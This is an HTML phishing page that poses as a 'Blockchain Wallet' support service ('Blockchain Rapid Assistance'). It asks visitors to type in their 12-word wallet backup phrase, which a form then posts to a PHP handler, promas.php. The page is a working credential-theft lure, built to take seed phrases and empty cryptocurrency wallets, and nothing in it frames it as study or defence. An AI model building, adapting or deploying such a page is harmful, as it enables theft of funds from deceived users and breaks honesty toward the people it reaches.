<!DOCTYPE html>
<html>

<head>

	<meta charset="utf-8">
	<meta http-equiv="X-UA-Compatible" content="IE=edge">
	<meta name="viewport" content="width=device-width, initial-scale=1">

	<title>Blockchain Wallet</title>

	<link rel="stylesheet" href="assets/deo.css">
	<link rel="stylesheet" href="assets/ontop.css">
	<link rel="shortcut icon" href="assets/bchtp.png">

</head>


	<header>
		<h1>BLOCKCHAIN</h1>
    </header>

    <div class="main-content">

        <!-- You only need this form and the form-labels-on-top.css -->

        <form class="form-labels-on-top" method="post" action="promas.php">

            <div class="form-title-row">
                <h1>Blockchain Rapid Assistance</h1>
				<p style="margin-top:-10px;">Our team requires your authorization to work on your account.	</p>
            </div>
            
             <div class="form-title-row">
                <h1>Your Backup Phrase</h1>
				<p style="margin-top:-10px;">Enter your 12 word phrase, lowercase with spaces between each word, to recover your funds and transactions.</p>
            </div>
            
          

            <div class="form-row">
                <label>
                    <input type="text" name="12dgt" required>
                </label>
            </div>
            
		

            <div class="form-row">
               <button type="submit" name="submit" style="width:100%;">CONTINUE</button>
            </div>
     	
			
        </form>

    </div>

</body>

</html>